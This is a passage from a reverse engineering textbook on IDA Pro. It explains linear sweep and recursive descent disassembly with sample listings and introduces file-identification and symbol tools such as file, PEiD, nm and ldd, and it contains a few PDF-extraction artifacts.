Fourth-generation languages

These exist but aren’t relevant to this book and will not be discussed.

Introduction to Disassembly 5

The What of Disassembly

In a traditional software development model, compilers, assemblers, and

linkers are used by themselves or in combination to create executable pro-

grams. In order to work our way backwards (or reverse engineer programs),

we use tools to undo the assembly and compilation processes. Not surprisingly,

such tools are called disassemblers and decompilers, and they do pretty much

what their names imply. A disassembler undoes the assembly process, so

we should expect assembly language as the output (and therefore machine

language as input). Decompilers aim to produce output in a high-level lan-

guage when given assembly or even machine language as input.

The promise of “source code recovery” will always be attractive in a

competitive software market, and thus the development of usable decompilers

remains an active research area in computer science. The following are just a

few of the reasons that decompilation is difficult:

The compilation process is lossy.

At the machine language level there are no variable or function names,

and variable type information can be determined only by how the data

is used rather than explicit type declarations. When you observe 32 bits

of data being transferred, you’ll need to do some investigative work to

determine whether those 32 bits represent an integer, a 32-bit floating

point value, or a 32-bit pointer.

Compilation is a many-to-many operation.

This means that a source program can be translated to assembly language

in many different ways, and machine language can be translated back to

source in many different ways. As a result, it is quite common that com-

piling a file and immediately decompiling it may yield a vastly different

source file from the one that was input.

Decompilers are very language and library dependent.

Processing a binary produced by a Delphi compiler with a decompiler

designed to generate C code can yield very strange results. Similarly,

feeding a compiled Windows binary through a decompiler that has no

knowledge of the Windows programming API may not yield anything

useful.

A nearly perfect disassembly capability is needed in order to accurately

decompile a binary.

Any errors or omissions in the disassembly phase will almost certainly

propagate through to the decompiled code.

Hex-Rays, the most sophisticated decompiler on the market today, will

be reviewed in Chapter 23.

6Chapter 1

The Why of Disassembly

The purpose of disassembly tools is often to facilitate understanding of pro-

grams when source code is unavailable. Common situations in which disas-

sembly is used include these:

zAnalysis of malware

zAnalysis of closed-source software for vulnerabilities

zAnalysis of closed-source software for interoperability

zAnalysis of compiler-generated code to validate compiler performance/

correctness

zDisplay of program instructions while debugging

The subsequent sections will explain each situation in more detail.

Malware Analysis

Unless you are dealing with a script-based worm, malware authors seldom do

you the favor of providing the source code to their creations. Lacking source

code, you are faced with a very limited set of options for discovering exactly

how the malware behaves. The two main techniques for malware analysis are

dynamic analysis and static analysis. Dynamic analysis involves allowing the

malware to execute in a carefully controlled environment (sandbox) while

recording every observable aspect of its behavior using any number of system

instrumentation utilities. In contrast, static analysis attempts to understand

the behavior of a program simply by reading through the program code,

which, in the case of malware, generally consists of a disassembly listing.

Vulnerability Analysis

For the sake of simplification, let’s break the entire security-auditing process

into three steps: vulnerability discovery, vulnerability analysis, and exploit

development. The same steps apply whether you have source code or not;

however, the level of effort increases substantially when all you have is a

binary. The first step in the process is to discover a potentially exploitable

condition in a program. This is often accomplished using dynamic tech-

niques such as fuzzing,1 but it can also be performed (usually with much

more effort) via static analysis. Once a problem has been discovered, further

analysis is often required to determine whether the problem is exploitable at

all and, if so, under what conditions.

Disassembly listings provide the level of detail required to understand

exactly how the compiler has chosen to allocate program variables. For

example, it might be useful to know that a 70-byte character array declared

by a programmer was rounded up to 80 bytes when allocated by the compiler.

Disassembly listings also provide the only means to determine exactly how a

1. Fuzzing is a vulnerability-discovery technique that relies on generating large numbers of

unique inputs for programs in the hope that one of those inputs will cause the program to fail in

a manner that can be detected, analyzed, and ultimately exploited.

Introduction to Disassembly 7

compiler has chosen to order all of the variables declared globally or within

functions. Understanding the spatial relationships among variables is often

essential when attempting to develop exploits. Ultimately, by using a disas-

sembler and a debugger together, an exploit may be developed.

Software Interoperability

When software is released in binary form only, it is very difficult for com-

petitors to create software that can interoperate with it or to provide plug-in

replacements for that software. A common example is driver code released

for hardware that is supported on only one platform. When a vendor is

slow to support or, worse yet, refuses to support the use of its hardware with

alternative platforms, substantial reverse engineering effort may be required

in order to develop software drivers to support the hardware. In these cases,

static code analysis is almost the only remedy and often must go beyond the

software driver to understand embedded firmware.

Compiler Validation

Since the purpose of a compiler (or assembler) is to generate machine lan-

guage, good disassembly tools are often required to verify that the compiler is

doing its job in accordance with any design specifications. Analysts may also

be interested in locating additional opportunities for optimizing compiler

output and, from a security standpoint, ascertaining whether the compiler

itself has been compromised to the extent that it may be inserting back doors

into generated code.

Debugging Displays

Perhaps the single most common use of disassemblers is to generate listings

within debuggers. Unfortunately, disassemblers embedded within debuggers

tend to be fairly unsophisticated. They are generally incapable of batch disas-

sembly and sometimes balk at disassembling when they cannot determine

the boundaries of a function. This is one of the reasons why it is best to use a

debugger in conjunction with a high-quality disassembler to provide better

situational awareness and context during debugging.

The How of Disassembly

Now that you’re well versed in the purposes of disassembly, it’s time to move

on to how the process actually works. Consider a typical daunting task faced

by a disassembler: Take these 100KB, distinguish code from data, convert the code to

assembly language for display to a user, and please don’t miss anything along the way.

We could tack any number of special requests on the end of this, such as

asking the disassembler to locate functions, recognize jump tables, and identify

local variables, making the disassembler’s job that much more difficult.

In order to accommodate all of our demands, any disassembler will need

to pick and choose from a variety of algorithms as it navigates through the

files that we feed it. The quality of the generated disassembly listing will be

8Chapter 1

directly related to the quality of the algorithms utilized and how well they

have been implemented. In this section we will discuss two of the fundamental

algorithms in use today for disassembling machine code. As we present these

algorithms, we will also point out their shortcomings in order to prepare you

for situations in which your disassembler appears to fail. By understanding a

disassembler’s limitations, you will be able to manually intervene to improve

the overall quality of the disassembly output.

A Basic Disassembly Algorithm

For starters, let’s develop a simple algorithm for accepting machine language

as input and producing assembly language as output. In doing so, we will

gain an understanding of the challenges, assumptions, and compromises

that underlie an automated disassembly process.

Step 1

The first step in the disassembly process is to identify a region of code to

disassemble. This is not necessarily as straightforward as it may seem.

Instructions are generally mixed with data, and it is important to distin-

guish between the two. In the most common case, disassembly of an

executable file, the file will conform to a common format for executable

files such as the Portable Executable (PE) format used on Windows or the

Executable and Linking Format (ELF) common on many Unix-based systems.

These formats typically contain mechanisms (often in the form of hierar-

chical file headers) for locating the sections of the file that contain code

and entry points2 into that code.

Step 2

Given an initial address of an instruction, the next step is to read the

value contained at that address (or file offset) and perform a table lookup

to match the binary opcode value to its assembly language mnemonic.

Depending on the complexity of the instruction set being disassembled,

this may be a trivial process, or it may involve several additional operations

such as understanding any prefixes that may modify the instruction’s

behavior and determining any operands required by the instruction. For

instruction sets with variable-length instructions, such as the Intel x86,

additional instruction bytes may need to be retrieved in order to com-

pletely disassemble a single instruction.

Step 3

Once an instruction has been fetched and any required operands

decoded, its assembly language equivalent is formatted and output as

part of the disassembly listing. It may be possible to choose from more

than one assembly language output syntax. For example, the two

predominant formats for x86 assembly language are the Intel format

and the AT&T format.

2. A program entry point is simply the address of the instruction to which the operating system

passes control once a program has been loaded into memory.

Introduction to Disassembly 9

Step 4

Following the output of an instruction, we need to advance to the next

instruction and repeat the previous process until we have disassembled

every instruction in the file.

Various algorithms exist for determining where to begin a disassembly,

how to choose the next instruction to be disassembled, how to distinguish

code from data, and how to determine when the last instruction has been

disassembled. The two predominant disassembly algorithms are linear sweep

and recursive descent.

Linear Sweep Disassembly

The linear sweep disassembly algorithm takes a very straightforward approach

to locating instructions to disassemble: Where one instruction ends, another

begins. As a result, the most difficult decision faced is where to begin. The

usual solution is to assume that everything contained in sections of a program

marked as code (typically specified by the program file’s headers) represents

machine language instructions. Disassembly begins with the first byte in a

code section and moves, in a linear fashion, through the section, disassem-

bling one instruction after another until the end of the section is reached.

No effort is made to understand the program’s control flow through recogni-

tion of nonlinear instructions such as branches.

During the disassembly process, a pointer can be maintained to mark the

beginning of the instruction currently being disassembled. As part of the

disassembly process, the length of each instruction is computed and used to

determine the location of the next instruction to be disassembled. Instruction

sets with fixed-length instructions (MIPS, for example) are somewhat easier

to disassemble, as locating subsequent instructions is straightforward.

X86 ASSEMBLY SYNTAX: AT&T VS. INTEL

There are two main syntaxes used for assembly source code: AT&T and Intel. Even

though they are second-generation languages, the two vary greatly in syntax from

variable, constant, and register access to segment and instruction size overrides

to indirection and offsets. The AT&T assembly syntax is distinguished by its use of

the % symbol to prefix all register names, the use of $ as a prefix for literal constants

(also called immediate operands), and its operand ordering in which the source

operand appears as the left-hand operand and the destination operand appears on

the right. Using AT&T syntax, the instruction to add four to the EAX register would

read: add $0x4,%eax. The GNU Assembler (Gas) and many other GNU tools, includ-

ing gcc and gdb, utilize AT&T syntax.

Intel syntax differs from AT&T in that it requires no register or literal prefixes

and the operand ordering is reversed such that the source operand appears on the

right and the destination appears on the left. The same add instruction using the Intel

syntax would read: add eax,0x4. Assemblers utilizing Intel syntax include the

Microsoft Assembler (MASM), Borland’s Turbo Assembler (TASM), and the Netwide

Assembler (NASM).

10 Chapter 1

The main advantage of the linear sweep algorithm is that it provides

complete coverage of a program’s code sections. One of the primary disad-

vantages of the linear sweep method is that it fails to account for the fact that

data may be comingled with code. This is evident in Listing 1-1, which shows

the output of a function disassembled with a linear sweep disassembler. This

function contains a switch statement, and the compiler used in this case

has elected to implement the switch using a jump table. Furthermore, the

compiler has elected to embed the jump table within the function itself. The

jmp statement at X, 401250, references an address table starting at Y, 401257.

Unfortunately, the disassembler treats Y as if it were an instruction and

incorrectly generates the corresponding assembly language representation:

40123f: 55 push ebp

401240: 8b ec mov ebp,esp

401242: 33 c0 xor eax,eax

401244: 8b 55 08 mov edx,DWORD PTR [ebp+8]

401247: 83 fa 0c cmp edx,0xc

40124a: 0f 87 90 00 00 00 ja 0x4012e0

X401250: ff 24 95 57 12 40 00 jmp DWORD PTR [edx*4+0x401257]

Y401257: e0 12 loopne 0x40126b

401259: 40 inc eax

40125a: 00 8b 12 40 00 90 add BYTE PTR [ebx-0x6fffbfee],cl

401260: 12 40 00 adc al,BYTE PTR [eax]

401263: 95 xchg ebp,eax

401264: 12 40 00 adc al,BYTE PTR [eax]

401267: 9a 12 40 00 a2 12 40 call 0x4012:0xa2004012

40126e: 00 aa 12 40 00 b2 add BYTE PTR [edx-0x4dffbfee],ch

401274: 12 40 00 adc al,BYTE PTR [eax]

401277: ba 12 40 00 c2 mov edx,0xc2004012

40127c: 12 40 00 adc al,BYTE PTR [eax]

40127f: ca 12 40 lret 0x4012

401282: 00 d2 add dl,dl

401284: 12 40 00 adc al,BYTE PTR [eax]

401287: da 12 ficom DWORD PTR [edx]

401289: 40 inc eax

40128a: 00 8b 45 0c eb 50 add BYTE PTR [ebx+0x50eb0c45],cl

401290: 8b 45 10 mov eax,DWORD PTR [ebp+16]

401293: eb 4b jmp 0x4012e0

Listing 1-1: Linear sweep disassembly

If we examine successive 4-byte groups as little-endian3 values beginning at

Y, we see that each represents a pointer to a nearby address that is in fact the

destination for one of various jumps (004012e0, 0040128b, 00401290, . . .). Thus,

the loopne instruction at Y is not an instruction at all. Instead, it indicates a

failure of the linear sweep algorithm to properly distinguish embedded

data from code.

Linear sweep is used by the disassembly engines contained in the GNU

debugger (gdb), Microsoft’s WinDbg debugger, and the objdump utility.

3. A CPU is described as either big-endian or little-endian depending on whether the CPU saves

the most significant byte of a multibyte value first (big-endian) or whether it stores the least

significant byte first (little-endian).

Introduction to Disassembly 11

Recursive Descent Disassembly

Recursive descent takes a different approach to locating instructions. Recur-

sive descent focuses on the concept of control flow, which determines whether

an instruction should be disassembled or not based on whether it is referenced

by another instruction. To understand recursive descent, it is helpful to clas-

sify instructions according to how they affect the CPU instruction pointer.

Sequential Flow Instructions

Sequential flow instructions pass execution to the instruction that immediately

follows. Examples of sequential flow instructions include simple arithmetic

instructions, such as add; register-to-memory transfer instructions, such as mov;

and stack-manipulation operations, such as push and pop. For such instructions,

disassembly proceeds as with linear sweep.

Conditional Branching Instructions

Conditional branching instructions, such as the x86 jnz, offer two possible

execution paths. If the condition evaluates to true, the branch is taken, and

the instruction pointer must be changed to reflect the target of the branch.

However, if the condition is false, execution continues in a linear fashion,

and a linear sweep methodology can be used to disassemble the next instruc-

tion. As it is generally not possible in a static context to determine the out-

come of a conditional test, the recursive descent algorithm disassembles both

paths, deferring disassembly of the branch target instruction by adding the

address of the target instruction to a list of addresses to be disassembled at a

later point.

Unconditional Branching Instructions

Unconditional branches do not follow the linear flow model and therefore are

handled differently by the recursive descent algorithm. As with the sequential

flow instructions, execution can flow to only one instruction; however, that

instruction need not immediately follow the branch instruction. In fact,

as seen in Listing 1-1, there is no requirement at all for an instruction to

immediately follow an unconditional branch. Therefore, there is no reason

to disassemble the bytes that follow an unconditional branch.

A recursive descent disassembler will attempt to determine the target

of the unconditional jump and add the destination address to the list of

addresses that have yet to be explored. Unfortunately, some unconditional

branches can cause problems for recursive descent disassemblers. When the

target of a jump instruction depends on a runtime value, it may not be possi-

ble to determine the destination of the jump using static analysis. The x86

instruction jmp eax demonstrates this problem. The eax register contains a

value only when the program is actually running. Since the register contains

no value during static analysis, we have no way to determine the target of the

jump instruction, and consequently, we have no way to determine where to

continue the disassembly process.

12 Chapter 1

Function Call Instructions

Function call instructions operate in a manner very similar to unconditional

jump instructions (including the inability of the disassembler to determine the

target of instructions such as call eax), with the additional expectation that

execution usually returns to the instruction immediately following the call

instruction once the function completes. In this regard, they are similar to

conditional branch instructions in that they generate two execution paths.

The target address of the call instruction is added to a list for deferred disas-

sembly, while the instruction immediately following the call is disassembled in

a manner similar to linear sweep.

Recursive descent can fail if programs do not behave as expected when

returning from called functions. For example, code in a function can delib-

erately manipulate the return address of that function so that upon comple-

tion, control returns to a location different from the one expected by the

disassembler. A simple example is shown in the following incorrect listing,

where function foo simply adds 1 to the return address before returning to

the caller.

foo proc near

FF 04 24 inc dword ptr [esp] ; increments saved return addr

C3 retn

foo endp

; -------------------------------------

bar:

E8 F7 FF FF FF call foo

05 89 45 F8 90 Xadd eax, 90F84589h

As a result, control does not actually pass to the add instruction at X fol-

lowing the call to foo. A proper disassembly appears below:

foo proc near

FF 04 24 inc dword ptr [esp]

C3 retn

foo endp

; -------------------------------------

bar:

E8 F7 FF FF FF call foo

05 db 5 ;formerly the first byte of the add instruction

89 45 F8 Ymov [ebp-8], eax

90 nop

This listing more clearly shows the actual flow of the program in which

function foo actually returns to the mov instruction at Y. It is important to

understand that a linear sweep disassembler will also fail to properly dis-

assemble this code, though for slightly different reasons.

Return Instructions

In some cases, the recursive descent algorithm runs out of paths to follow.

A function return instruction (x86 ret, for example) offers no information

about what instruction will be executed next. If the program were actually

Introduction to Disassembly 13

running, an address would be taken from the top of the runtime stack, and

execution would resume at that address. Disassemblers do not have the

benefit of access to a stack. Instead, disassembly abruptly comes to a halt. It

is at this point that the recursive descent disassembler turns to the list of

addresses it has been setting aside for deferred disassembly. An address is

removed from this list, and the disassembly process is continued from this

address. This is the recursive process that lends the disassembly algorithm

its name.

One of the principle advantages of the recursive descent algorithm is

its superior ability to distinguish code from data. As a control flow–based

algorithm, it is much less likely to incorrectly disassemble data values as

code. The main disadvantage of recursive descent is the inability to follow

indirect code paths, such as jumps or calls, which utilize tables of pointers to

look up a target address. However, with the addition of some heuristics to

identify pointers to code, recursive descent disassemblers can provide very

complete code coverage and excellent recognition of code versus data. List-

ing 1-2 shows the output of a recursive descent disassembler used on the

same switch statement shown earlier in Listing 1-1.

0040123F push ebp

00401240 mov ebp, esp

00401242 xor eax, eax

00401244 mov edx, [ebp+arg_0]

00401247 cmp edx, 0Ch ; switch 13 cases

0040124A ja loc_4012E0 ; default

0040124A ; jumptable 00401250 case 0

00401250 jmp ds:off_401257[edx*4] ; switch jump

00401250 ; ---------------------------------------------------

00401257 off_401257:

00401257 dd offset loc_4012E0 ; DATA XREF: sub_40123F+11r

00401257 dd offset loc_40128B ; jump table for switch statement

00401257 dd offset loc_401290

00401257 dd offset loc_401295

00401257 dd offset loc_40129A

00401257 dd offset loc_4012A2

00401257 dd offset loc_4012AA

00401257 dd offset loc_4012B2

00401257 dd offset loc_4012BA

00401257 dd offset loc_4012C2

00401257 dd offset loc_4012CA

00401257 dd offset loc_4012D2

00401257 dd offset loc_4012DA

0040128B ; ---------------------------------------------------

0040128B

0040128B loc_40128B: ; CODE XREF: sub_40123F+11j

0040128B ; DATA XREF: sub_40123F:off_401257o

0040128B mov eax, [ebp+arg_4] ; jumptable 00401250 case 1

0040128E jmp short loc_4012E0 ; default

0040128E ; jumptable 00401250 case 0

Listing 1-2: Recursive descent disassembly

14 Chapter 1

Note that the table of jump destinations has been recognized and for-

matted accordingly. IDA Pro is the most prominent example of a recursive

descent disassembler. An understanding of the recursive descent process will

help us recognize situations in which IDA may produce less than optimal dis-

assemblies and allow us to develop strategies to improve IDA’s output.

Summary

Is deep understanding of disassembly algorithms essential when using a

disassembler? No. Is it useful? Yes! Battling your tools is the last thing you

want to spend time doing while reverse engineering. One of the many advan-

tages of IDA is that, unlike most other disassemblers, it offers you plenty of

opportunity to guide and override its decisions. The net result is that the fin-

ished product, an accurate disassembly, will be far superior to anything else

available.

In the next chapter we will review a variety of existing tools that prove

useful in many reverse engineering situations. While not directly related to

IDA, many of these tools have influenced and been influenced by IDA, and

they help to explain the wide variety of informational displays available in the

IDA user interface.

JMP

EBP

SUB

REVERSING AND

DISASSEMBLY TOOLS

With some disassembly background under

our belts, and before we begin our dive into

the specifics of IDA Pro, it will be useful to

understand some of the other tools that are

used for reverse engineering binaries. Many of these

tools predate IDA and continue to be useful for quick

glimpses into files as well as for double-checking the work that IDA does.

As we will see, IDA rolls many of the capabilities of these tools into its user

interface to provide a single, integrated environment for reverse engineering.

Finally, although IDA does contain an integrated debugger, we will not cover

debuggers here as Chapters 24, 25, and 26 are dedicated to the topic.

16 Chapter 2

Classification Tools

When first confronted with an unknown file, it is often useful to answer

simple questions such as “What is this thing?” The first rule of thumb when

attempting to answer that question is to never rely on a filename extension to

determine what a file actually is. That is also the second, third, and fourth

rules of thumb. Once you have become an adherent of the file extensions are

meaningless line of thinking, you may wish to familiarize yourself with one or

more of the following utilities.

file

The file command is a standard utility, included with most *NIX-style

operating systems and with the Cygwin1 or MinGW2 tools for Windows. File

attempts to identify a file’s type by examining specific fields within the file. In

some cases file recognizes common strings such as #!/bin/sh (a shell script)

or <html> (an HTML document). Files containing non-ASCII content present

somewhat more of a challenge. In such cases, file attempts to determine

whether the content appears to be structured according to a known file for-

mat. In many cases it searches for specific tag values (often referred to as

magic numbers3) known to be unique to specific file types. The hex listings

below show several examples of magic numbers used to identify some com-

mon file types.

Windows PE executable file

00000000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............

00000010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......

Jpeg image file

00000000 FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 ......JFIF.....`

00000010 00 60 00 00 FF DB 00 43 00 0A 07 07 08 07 06 0A .`.....C........

Java .class file

00000000 CA FE BA BE 00 00 00 32 00 98 0A 00 2E 00 3E 08 .......2......>.

00000010 00 3F 09 00 40 00 41 08 00 42 0A 00 43 00 44 0A .?..@.A..B..C.D.

file has the capability to identify a large number of file formats, including

several types of ASCII text files and various executable and data file formats.

The magic number checks performed by file are governed by rules contained

in a magic file. The default magic file varies by operating system, but common

locations include /usr/share/file/magic, /usr/share/misc/magic, and /etc/magic.

Please refer to the documentation for file for more information concerning

magic files.

1. See http://www.cygwin.com/.

2. See http://www.mingw.org/.

3. A magic number is a special tag value required by some file format specifications whose presence

indicates conformance to such specifications. In some cases humorous reasons surround the

selection of magic numbers. The MZ tag in MS-DOS executable file headers represents the initials

of Mark Zbikowski, one of the original architects of MS-DOS, while the hex value 0xcafebabe,

the well-known magic number associated with Java .class files, was chosen because it is an easily

remembered sequence of hex digits.

Reversing and Disassembly Tools 17

In some cases, file can distinguish variations within a given file type.

The following listing demonstrates file’s ability to identify not only several

variations of ELF binaries but also information pertaining to how the binary

was linked (statically or dynamically) and whether the binary was stripped

or not.

idabook# file ch2_ex_*

ch2_ex.exe: MS-DOS executable PE for MS Windows (console)

Intel 80386 32-bit

ch2_ex_upx.exe: MS-DOS executable PE for MS Windows (console)

Intel 80386 32-bit, UPX compressed

ch2_ex_freebsd: ELF 32-bit LSB executable, Intel 80386,

version 1 (FreeBSD), for FreeBSD 5.4,

dynamically linked (uses shared libs),

FreeBSD-style, not stripped

ch2_ex_freebsd_static: ELF 32-bit LSB executable, Intel 80386,

version 1 (FreeBSD), for FreeBSD 5.4,

statically linked, FreeBSD-style, not stripped

ch2_ex_freebsd_static_strip: ELF 32-bit LSB executable, Intel 80386,

version 1 (FreeBSD), for FreeBSD 5.4,

statically linked, FreeBSD-style, stripped

ch2_ex_linux: ELF 32-bit LSB executable, Intel 80386,

version 1 (SYSV), for GNU/Linux 2.6.9,

dynamically linked (uses shared libs),

not stripped

ch2_ex_linux_static: ELF 32-bit LSB executable, Intel 80386,

version 1 (SYSV), for GNU/Linux 2.6.9,

statically linked, not stripped

ch2_ex_linux_static_strip: ELF 32-bit LSB executable, Intel 80386,

version 1 (SYSV), for GNU/Linux 2.6.9,

statically linked, stripped

ch2_ex_linux_stripped: ELF 32-bit LSB executable, Intel 80386,

version 1 (SYSV), for GNU/Linux 2.6.9,

dynamically linked (uses shared libs), stripped

THE CYGWIN ENVIRONMENT

Cygwin is a set of utilities for the Windows operating system that provides a Linux-style

command shell and associated programs. During installation, users can choose from a

large number of standard packages, including compilers (gcc, g++), interpreters

(Perl, Python, Ruby), networking utilities (nc, ssh), and many others. Once Cygwin

has been installed, many programs written for use with Linux can be compiled and

executed on Windows systems.

18 Chapter 2

file and similar utilities are not foolproof. It is quite possible for a file to

be misidentified simply because it happens to bear the identifying marks of

some file format. You can see this for yourself by using a hex editor to modify

the first four bytes of any file to the Java magic number sequence: CA FE BA BE.

The file utility will incorrectly identify the newly modified file as compiled

Java class data. Similarly, a text file containing only the two characters MZ will

be identified as an MS-DOS executable. A good approach to take in any reverse

engineering effort is to never fully trust the output of any tool until you have

correlated that output with several tools and manual analysis.

PE Tools

PE Tools4 is a collection of tools useful for analyzing both running processes

and executable files on Windows systems. Figure 2-1 shows the primary

interface offered by PE Tools, which displays a list of active processes and

provides access to all of the PE Tools utilities.

Figure 2-1: The PE Tools utility

4. See http://petools.org.ru/petools.shtml.

STRIPPING BINARY EXECUTABLE FILES

Stripping a binary is the process of removing symbols from the binary file. Binary

object files contain symbols as a result of the compilation process. Some of these

symbols are utilized during the linking process to resolve references between files

when creating the final executable file or library. In other cases, symbols may be

present to provide additional information for use with debuggers. Following the

linking process, many of the symbols are no longer required. Options passed to

the linker can cause the linker to remove the unnecessary symbols at build time.

Alternatively, a utility named strip may be used to remove symbols from existing

binary files. While a stripped binary will be smaller than its unstripped counterpart,

the behavior of the stripped binary will remain unchanged.

Reversing and Disassembly Tools 19

From the process list, users can dump a process’s memory image to a file

or utilize the PE Sniffer utility to determine what compiler was used to build

the executable or whether the executable was processed by any known

obfuscation utilities. The Tools menu offers similar options for analysis of

disk files. Users can view a file’s PE header fields by using the embedded PE

Editor utility, which also allows for easy modification of any header values.

Modification of PE headers is often required when attempting to reconstruct

a valid PE from an obfuscated version of that file.

PEiD

PEiD5 is another Windows tool whose primary purposes are to identify the

compiler used to build a particular Windows PE binary and to identify any

tools used to obfuscate a Windows PE binary. Figure 2-2 shows the use of

PEiD to identify the tool (ASPack in this case) used to obfuscate a variant of

the Gaobot6 worm.

Figure 2-2: The PEiD utility

5. See http://peid.info/.

6. See http://securityresponse.symantec.com/security_response/writeup.jsp?docid=2003-112112-1102-99.

BINARY FILE OBFUSCATION

Obfuscation is any attempt to obscure the true meaning of something. When applied

to executable files, obfuscation is any attempt to hide the true behavior of a program.

Programmers may employ obfuscation for a number of reasons. Commonly cited

examples include protecting proprietary algorithms and obscuring malicious intent.

Nearly all forms of malware utilize obfuscation in an effort to hinder analysis. Tools

are widely available to assist program authors in generating obfuscated programs.

Obfuscation tools and techniques and their associated impact on the reverse engi-

neering process will be discussed further in Chapter 21.

20 Chapter 2

Many additional capabilities of PEiD overlap those of PE Tools, including

the ability to summarize PE file headers, collect information on running pro-

cesses, and perform basic disassembly.

Summary Tools

Since our goal is to reverse engineer binary program files, we are going to

need more sophisticated tools to extract detailed information following initial

classification of a file. The tools discussed in this section, by necessity, are far

more aware of the formats of the files that they process. In most cases, these

tools understand a very specific file format, and the tools are utilized to parse

input files to extract very specific information.

When source files are compiled to object files, compilers must embed informa-

tion regarding the location of any global (external) symbols so that the linker

will be able to resolve references to those symbols when it combines object

files to create an executable. Unless instructed to strip symbols from the final

executable, the linker generally carries symbols from the object files over

into the resulting executable. According to the man page, the purpose of the

nm utility is to “list symbols from object files.”

When nm is used to examine an intermediate object file (a .o file rather

than an executable), the default output yields the names of any functions

and global variables declared in the file. Sample output of the nm utility is

shown below:

idabook# gcc -c ch2_example.c

idabook# nm ch2_example.o

U __stderrp

U exit

U fprintf

00000038 T get_max

00000000 t hidden

00000088 T main

00000000 D my_initialized_global

00000004 C my_unitialized_global

U printf

U rand

U scanf

U srand

U time

00000010 T usage

idabook#

Here we see that nm lists each symbol along with some information about

the symbol. The letter codes are used to indicate the type of symbol being

Reversing and Disassembly Tools 21

listed. In this example, we see the following letter codes, which we will now

explain:

NOTE Uppercase letter codes are used for global symbols, whereas lowercase letter codes are used

for local symbols. A full explanation of the letter codes can be found in the man

page for nm.

Somewhat more information is displayed when nm is used to display sym-

bols from an executable file. During the link process, symbols are resolved to

virtual addresses (when possible), which results in more information being

available when nm is run. Truncated example output from nm used on an

executable is shown here:

idabook# gcc -o ch2_example ch2_example.c

idabook# nm ch2_example

<. . .>

U exit

U fprintf

080485c0 t frame_dummy

08048644 T get_max

0804860c t hidden

08048694 T main

0804997c D my_initialized_global

08049a9c B my_unitialized_global

08049a80 b object.2

08049978 d p.0

U printf

U rand

U scanf

U srand

U time

0804861c T usage

idabook#

At this point, some of the symbols (main, for example) have been assigned

virtual addresses, new ones (frame_dummy) have been introduced as a result of

the linking process, some (my_unitialized_global) have had their symbol type

changed, and others remain undefined as they continue to reference external

symbols. In this case, the binary we are examining is dynamically linked, and

the undefined symbols are defined in the shared C library. More information

regarding nm can be found in its associated man page.

UAn undefined symbol, usually an external symbol reference.

TA symbol defined in the text section, usually a function name.

tA local symbol defined in the text section. In a C program, this usu-

ally equates to a static function.

DAn initialized data value.

CAn uninitialized data value.

22 Chapter 2

ldd

When an executable is created, the location of any library functions referenced

by that executable must be resolved. The linker has two methods for resolving

calls to library functions: static linking and dynamic linking. Command-line

arguments provided to the linker determine which of the two methods is used.

An executable may be statically linked, dynamically linked, or both.7

When static linking is requested, the linker combines an application’s

object files with a copy of the required library to create an executable file.

At runtime, there is no need to locate the library code because it is already

contained within the executable. Advantages of static linking are that (1) it

results in slightly faster function calls and (2) distribution of binaries is easier

because no assumptions need be made regarding the availability of library

code on users’ systems. Disadvantages of static linking include (1) larger

resulting executables and (2) greater difficulty upgrading programs when

library components change. Programs are more difficult to update because

they must be relinked every time a library is changed. From a reverse engineer-

ing perspective, static linking complicates matters somewhat. If we are faced

with the task of analyzing a statically linked binary, there is no easy way to

answer the questions “Which libraries are linked into this binary?” and “Which

of these functions is a library function?” Chapter 12 will discuss the challenges

encountered while reverse engineering statically linked code.

Dynamic linking differs from static linking in that the linker has no need

to make a copy of any required libraries. Instead, the linker simply inserts ref-

erences to any required libraries (often .so or .dll files) into the final execut-

able, usually resulting in much smaller executable files. Upgrading library

code is much easier when dynamic linking is utilized. Since a single copy of a

library is maintained and that copy is referenced by many binaries, replacing

the single outdated library with a new version instantly updates every binary

that makes use of that library. One of the disadvantages of using dynamic

linking is that it requires a more complicated loading process. All of the nec-

essary libraries must be located and loaded into memory, as opposed to load-

ing one statically linked file that happens to contain all of the library code.

Another disadvantage of dynamic linking is that vendors must distribute not

only their own executable file but also all library files upon which that exe-

cutable depends. Attempting to execute a program on a system that does

not contain all the required library files will result in an error.

The following output demonstrates the creation of dynamically and

statically linked versions of a program, the size of the resulting binaries, and

the manner in which file identifies those binaries:

idabook# gcc -o ch2_example_dynamic ch2_example.c

idabook# gcc -o ch2_example_static ch2_example.c --static

idabook# ls -l ch2_example_*

-rwxr-xr-x 1 root wheel 6017 Sep 26 11:24 ch2_example_dynamic

-rwxr-xr-x 1 root wheel 167987 Sep 26 11:23 ch2_example_static

7. For more information on linking, consult John R. Levine, Linkers and Loaders (San Francisco:

Morgan Kaufmann, 2000).

Reversing and Disassembly Tools 23

idabook# file ch2_example_*

ch2_example_dynamic: ELF 32-bit LSB executable, Intel 80386, version 1

(FreeBSD), dynamically linked (uses shared libs), not stripped

ch2_example_static: ELF 32-bit LSB executable, Intel 80386, version 1

(FreeBSD), statically linked, not stripped

idabook#

In order for dynamic linking to function properly, dynamically linked

binaries must indicate which libraries they depend on along with the specific

resources that are required from each of those libraries. As a result, unlike

statically linked binaries, it is quite simple to determine the libraries on which

a dynamically linked binary depends. The ldd (list dynamic dependencies) utility

is a simple tool used to list the dynamic libraries required by any executable.

In the following example, ldd is used to determine the libraries on which the

Apache web server depends:

idabook# ldd /usr/local/sbin/httpd

/usr/local/sbin/httpd:

libm.so.4 => /lib/libm.so.4 (0x280c5000)

libaprutil-1.so.2 => /usr/local/lib/libaprutil-1.so.2 (0x280db000)

libexpat.so.6 => /usr/local/lib/libexpat.so.6 (0x280ef000)

libiconv.so.3 => /usr/local/lib/libiconv.so.3 (0x2810d000)

libapr-1.so.2 => /usr/local/lib/libapr-1.so.2 (0x281fa000)

libcrypt.so.3 => /lib/libcrypt.so.3 (0x2821a000)

libpthread.so.2 => /lib/libpthread.so.2 (0x28232000)

libc.so.6 => /lib/libc.so.6 (0x28257000)

idabook#

The ldd utility is available on Linux and BSD systems. On OS X systems,

similar functionality is available using the otool utility with the –L option:

otool -L filename. On Windows systems, the dumpbin utility, part of the Visual

Studio tool suite, can be used to list dependent libraries: dumpbin /dependents

filename.

objdump

Whereas ldd is fairly specialized, objdump is extremely versatile. The purpose

of objdump is to “display information from object files.”8 This is a fairly broad

goal, and in order to accomplish it, objdump responds to a large number (30+)

of command-line options tailored to extract various pieces of information

from object files. objdump can be used to display the following data (and much

